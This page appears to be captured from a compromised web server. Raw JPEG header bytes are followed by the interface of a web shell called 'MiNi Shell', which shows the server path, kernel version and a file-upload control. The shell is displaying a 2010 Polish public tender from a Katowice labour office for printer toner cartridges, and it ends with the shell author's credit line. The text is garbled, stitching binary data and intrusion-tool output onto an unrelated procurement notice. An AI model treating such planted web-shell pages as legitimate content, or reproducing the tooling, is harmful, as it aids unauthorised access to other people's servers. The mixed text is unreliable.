JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100611/151517-N-2010.html

<p class="kh_header"><b>Katowice: DOSTAWA MATERIAŁÓW EKSPLOATACYJNYCH DLA PROJEKÓW KOMPETENCJE NA MIARĘ POTRZEB ORAZ PROMOCJA PRZEDSIĘBIORCZOŚCI W WOJEWÓDZTWIE ŚLĄSKIM</b><br>
<b>Numer ogłoszenia: 151517 - 2010; data zamieszczenia: 11.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu województwa nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MATERIAŁÓW EKSPLOATACYJNYCH DLA PROJEKÓW KOMPETENCJE NA MIARĘ POTRZEB ORAZ PROMOCJA PRZEDSIĘBIORCZOŚCI W WOJEWÓDZTWIE ŚLĄSKIM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych 
dla projektów Kompetencje na miarę potrzeb oraz Promocja przedsiębiorczości 
w województwie śląskim. Postępowanie prowadzone jest w 2 częściach.  

1.	Część I: 
Przedmiotem zamówienia jest dostawa wkładów drukujących do urządzenia wielofunkcyjnego typu HP LaserJet CM 2320 nf MFP dla projektu Kompetencje na miarę potrzeb:
Ilość:  10 sztuk, w tym:
4 sztuki - CC530A 
2 sztuki - CC531A
2 sztuki - CC532A
2 sztuki - CC533A 
Wkłady drukujące dostarczone przez Wykonawcę będą fabrycznie nowe (nieregenerowane, bez jakichkolwiek elementów starej obudowy). 
Przez fabrycznie nowe wkłady drukujące Zamawiający rozumie produkty wykonane 
z nowych elementów, bez śladów uszkodzenia w oryginalnych opakowaniach producenta 
z widocznym logo, symbolem produktu i terminem przydatności do użytku.
Opakowania, w których dostarczone zostaną wkłady drukujące muszą posiadać czytelną nazwę producenta i listę kompatybilności (listę typów drukarek, kserokopiarek, urządzeń wielofunkcyjnych, do których są przystosowane).

Zamawiający dopuszcza składanie ofert na dostawę wkładów drukujących wyprodukowanych przez producenta innego niż producent urządzenia wielofunkcyjnego typu HP LaserJet CM 2320 nf MFP. Wkłady drukujące wyprodukowane przez innego producenta muszą być równoważne jakościowo, spełniać równoważne parametry.
Przez wkłady drukujące równoważne Zamawiający rozumie produkt kompatybilny 
z urządzeniem wielofunkcyjnym HP LaserJet CM 2320 nf MFP, o parametrach takich samych bądź lepszych (pojemności tonera, wydajności, jakości wydruku) w stosunku 
do oryginału produkowanego przez producenta urządzania. 
Zamawiający wymaga, aby dostarczone wkłady drukujące posiadały 24 miesięczną gwarancję od dnia dostawy. 

Wykonawca zobowiązuje się do pokrycia kosztów naprawy urządzenia wielofunkcyjnego, gdy jego uszkodzenie powstanie w wyniku stosowania wkładów drukujących równoważnych dostarczonych przez Wykonawcę:
Za podstawę żądania przez Zamawiającego naprawy urządzenia wielofunkcyjnego uważa się pisemną opinię autoryzowanego serwisu producenta urządzenia. 
Wykonawca zobowiązany jest w terminie 3 dni roboczych (od dnia zgłoszenia przez Zamawiającego konieczności wykonania naprawy urządzenia wielofunkcyjnego) do wykonania zlecenia serwisowego w autoryzowanym serwisie producenta urządzenia wielofunkcyjnego.
Naprawa urządzenia wielofunkcyjnego przez autoryzowany serwis producenta urządzenia może odbyć się w siedzibie Zamawiającego lub w autoryzowanym serwisie producenta po uprzednim odebraniu urządzenia wielofunkcyjnego przez firmę kurierską wskazaną przez autoryzowany serwis.
Koszty związane z naprawą ponosi Wykonawca. 
W razie stwierdzenia wad, braku towaru lub dostarczenia towaru niezgodnego 
z zamówieniem Zamawiający niezwłocznie powiadomi (w terminie do 2 dni roboczych) Wykonawcę o zaistniałych okolicznościach (reklamacja), a Wykonawca zobowiązuje się na własny koszt do uzupełnienia braku, wymiany wadliwego lub niezgodnego przedmiotu zamówienia w terminie 4 dni od dnia powiadomienia. 

2.	Część II:
Przedmiotem zamówienia jest dostawa fabrycznie nowych wkładów drukujących 
do urządzenia wielofunkcyjnego typu HP LaserJet M2727nf.
Ilość - 4 szt. typu Q7553A
Wkłady drukujące dostarczone przez Wykonawcę będą fabrycznie nowe (nieregenerowane, bez jakichkolwiek elementów starej obudowy). 
Przez fabrycznie nowe wkłady drukujące Zamawiający rozumie produkty wykonane 
z nowych elementów, bez śladów uszkodzenia w oryginalnych opakowaniach producenta z widocznym logo, symbolem produktu i terminem przydatności do użytku.
Opakowania, w których dostarczone zostaną wkłady drukujące muszą posiadać czytelną nazwę producenta i listę kompatybilności (listę typów drukarek, kserokopiarek, urządzeń wielofunkcyjnych, do których są przystosowane).

Zamawiający dopuszcza składanie ofert na dostawę wkładów drukujących wyprodukowanych przez producenta innego niż producent urządzenia wielofunkcyjnego typu HP LaserJet M2727nf. Wkłady drukujące wyprodukowane przez innego producenta muszą być równoważne jakościowo, spełniać równoważne parametry.
Przez wkłady drukujące równoważne Zamawiający rozumie produkt kompatybilny 
z urządzeniem wielofunkcyjnym HP LaserJet M2727nf, o parametrach takich samych bądź lepszych (pojemności tonera, wydajności, jakości wydruku) w stosunku do oryginału produkowanego przez producenta urządzania. 
Zamawiający wymaga, aby dostarczone wkłady drukujące posiadały 24 miesięczną gwarancję od dnia dostawy. 

Wykonawca zobowiązuje się do pokrycia kosztów naprawy urządzenia wielofunkcyjnego, gdy jego uszkodzenie powstanie w wyniku stosowania wkładów drukujących równoważnych dostarczonych przez Wykonawcę:
Za podstawę żądania przez Zamawiającego naprawy urządzenia wielofunkcyjnego uważa się pisemną opinię autoryzowanego serwisu producenta urządzenia. 
Wykonawca zobowiązany jest w terminie 3 dni roboczych (od dnia zgłoszenia przez Zamawiającego konieczności wykonania naprawy urządzenia wielofunkcyjnego) do wykonania zlecenia serwisowego w autoryzowanym serwisie producenta urządzenia wielofunkcyjnego.
Naprawa urządzenia wielofunkcyjnego przez autoryzowany serwis producenta urządzenia może odbyć się w siedzibie Zamawiającego lub w autoryzowanym serwisie producenta po uprzednim odebraniu urządzenia wielofunkcyjnego przez firmę kurierską wskazaną przez autoryzowany serwis.
Koszty związane z naprawą ponosi Wykonawca. 
W razie stwierdzenia wad, braku towaru lub dostarczenia towaru niezgodnego 
z zamówieniem Zamawiający niezwłocznie powiadomi (w terminie do 
2 dni roboczych) Wykonawcę o zaistniałych okolicznościach (reklamacja), 
a Wykonawca zobowiązuje się na własny koszt do uzupełnienia braku, wymiany wadliwego lub niezgodnego przedmiotu zamówienia w terminie 4 dni od dnia powiadomienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykażą się realizacją co najmniej pięciu dostaw odpowiadających swoim rodzajem 
i zakresem przedmiotowi zamówienia w ciągu  ostatnich 3 lat, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem dat ich wykonania i odbiorców. Należy załączyć dokumenty  potwierdzające, że te usługi zostały wykonane należycie - np. referencje,

Opis sposobu dokonywania oceny spełnienia tego warunku:
	- Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert,a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie (np. referencje). 

  Zamawiający na podstawie załączonych dokumentów oceni spełnienie tego warunku w następujący sposób: spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach
ul. Kościuszki 31
pok. 304 - 305 piętro I.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2010 godzina 11:00, miejsce: Wojewódzki Urząd Pracy w Katowicach
ul. Kościuszki 31
pok.352  piętro I.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DOSTAWA MATERIAŁÓW EKSPLOATACYJNYCH DLA PROJEKÓW KOMPETENCJE NA MIARĘ POTRZEB ORAZ PROMOCJA PRZEDSIĘBIORCZOŚCI W WOJEWÓDZTWIE ŚLĄSKIM.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Część I: 
Przedmiotem zamówienia jest dostawa wkładów drukujących do urządzenia wielofunkcyjnego typu HP LaserJet CM 2320 nf MFP dla projektu Kompetencje na miarę potrzeb:
Ilość:  10 sztuk, w tym:
4 sztuki - CC530A 
2 sztuki - CC531A
2 sztuki - CC532A
2 sztuki - CC533A 
Wkłady drukujące dostarczone przez Wykonawcę będą fabrycznie nowe (nieregenerowane, bez jakichkolwiek elementów starej obudowy). 
Przez fabrycznie nowe wkłady drukujące Zamawiający rozumie produkty wykonane 
z nowych elementów, bez śladów uszkodzenia w oryginalnych opakowaniach producenta 
z widocznym logo, symbolem produktu i terminem przydatności do użytku.
Opakowania, w których dostarczone zostaną wkłady drukujące muszą posiadać czytelną nazwę producenta i listę kompatybilności (listę typów drukarek, kserokopiarek, urządzeń wielofunkcyjnych, do których są przystosowane).

Zamawiający dopuszcza składanie ofert na dostawę wkładów drukujących wyprodukowanych przez producenta innego niż producent urządzenia wielofunkcyjnego typu HP LaserJet CM 2320 nf MFP. Wkłady drukujące wyprodukowane przez innego producenta muszą być równoważne jakościowo, spełniać równoważne parametry.
Przez wkłady drukujące równoważne Zamawiający rozumie produkt kompatybilny 
z urządzeniem wielofunkcyjnym HP LaserJet CM 2320 nf MFP, o parametrach takich samych bądź lepszych (pojemności tonera, wydajności, jakości wydruku) w stosunku 
do oryginału produkowanego przez producenta urządzania. 
Zamawiający wymaga, aby dostarczone wkłady drukujące posiadały 24 miesięczną gwarancję od dnia dostawy. 

Wykonawca zobowiązuje się do pokrycia kosztów naprawy urządzenia wielofunkcyjnego, gdy jego uszkodzenie powstanie w wyniku stosowania wkładów drukujących równoważnych dostarczonych przez Wykonawcę:
Za podstawę żądania przez Zamawiającego naprawy urządzenia wielofunkcyjnego uważa się pisemną opinię autoryzowanego serwisu producenta urządzenia. 
Wykonawca zobowiązany jest w terminie 3 dni roboczych (od dnia zgłoszenia przez Zamawiającego konieczności wykonania naprawy urządzenia wielofunkcyjnego) do wykonania zlecenia serwisowego w autoryzowanym serwisie producenta urządzenia wielofunkcyjnego.
Naprawa urządzenia wielofunkcyjnego przez autoryzowany serwis producenta urządzenia może odbyć się w siedzibie Zamawiającego lub w autoryzowanym serwisie producenta po uprzednim odebraniu urządzenia wielofunkcyjnego przez firmę kurierską wskazaną przez autoryzowany serwis.
Koszty związane z naprawą ponosi Wykonawca. 
W razie stwierdzenia wad, braku towaru lub dostarczenia towaru niezgodnego 
z zamówieniem Zamawiający niezwłocznie powiadomi (w terminie do 2 dni roboczych) Wykonawcę o zaistniałych okolicznościach (reklamacja), a Wykonawca zobowiązuje się na własny koszt do uzupełnienia braku, wymiany wadliwego lub niezgodnego przedmiotu zamówienia w terminie 4 dni od dnia powiadomienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> DOSTAWA MATERIAŁÓW EKSPLOATACYJNYCH DLA PROJEKÓW KOMPETENCJE NA MIARĘ POTRZEB ORAZ PROMOCJA PRZEDSIĘBIORCZOŚCI W WOJEWÓDZTWIE ŚLĄSKIM.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.	Część II:
Przedmiotem zamówienia jest dostawa fabrycznie nowych wkładów drukujących 
do urządzenia wielofunkcyjnego typu HP LaserJet M2727nf.
Ilość - 4 szt. typu Q7553A
Wkłady drukujące dostarczone przez Wykonawcę będą fabrycznie nowe (nieregenerowane, bez jakichkolwiek elementów starej obudowy). 
Przez fabrycznie nowe wkłady drukujące Zamawiający rozumie produkty wykonane 
z nowych elementów, bez śladów uszkodzenia w oryginalnych opakowaniach producenta 
z widocznym logo, symbolem produktu i terminem przydatności do użytku.
Opakowania, w których dostarczone zostaną wkłady drukujące muszą posiadać czytelną nazwę producenta i listę kompatybilności (listę typów drukarek, kserokopiarek, urządzeń wielofunkcyjnych, do których są przystosowane).

Zamawiający dopuszcza składanie ofert na dostawę wkładów drukujących wyprodukowanych przez producenta innego niż producent urządzenia wielofunkcyjnego typu HP LaserJet M2727nf. Wkłady drukujące wyprodukowane przez innego producenta muszą być równoważne jakościowo, spełniać równoważne parametry.
Przez wkłady drukujące równoważne Zamawiający rozumie produkt kompatybilny 
z urządzeniem wielofunkcyjnym HP LaserJet M2727nf, o parametrach takich samych bądź lepszych (pojemności tonera, wydajności, jakości wydruku) w stosunku do oryginału produkowanego przez producenta urządzania. 
Zamawiający wymaga, aby dostarczone wkłady drukujące posiadały 24 miesięczną gwarancję od dnia dostawy. 

Wykonawca zobowiązuje się do pokrycia kosztów naprawy urządzenia wielofunkcyjnego, gdy jego uszkodzenie powstanie w wyniku stosowania wkładów drukujących równoważnych dostarczonych przez Wykonawcę:
Za podstawę żądania przez Zamawiającego naprawy urządzenia wielofunkcyjnego uważa się pisemną opinię autoryzowanego serwisu producenta urządzenia. 
Wykonawca zobowiązany jest w terminie 3 dni roboczych (od dnia zgłoszenia przez Zamawiającego konieczności wykonania naprawy urządzenia wielofunkcyjnego) do wykonania zlecenia serwisowego w autoryzowanym serwisie producenta urządzenia wielofunkcyjnego.
Naprawa urządzenia wielofunkcyjnego przez autoryzowany serwis producenta urządzenia może odbyć się w siedzibie Zamawiającego lub w autoryzowanym serwisie producenta po uprzednim odebraniu urządzenia wielofunkcyjnego przez firmę kurierską wskazaną przez autoryzowany serwis.
Koszty związane z naprawą ponosi Wykonawca. 
W razie stwierdzenia wad, braku towaru lub dostarczenia towaru niezgodnego 
z zamówieniem Zamawiający niezwłocznie powiadomi (w terminie do 
2 dni roboczych) Wykonawcę o zaistniałych okolicznościach (reklamacja), 
a Wykonawca zobowiązuje się na własny koszt do uzupełnienia braku, wymiany wadliwego lub niezgodnego przedmiotu zamówienia w terminie 4 dni od dnia powiadomienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com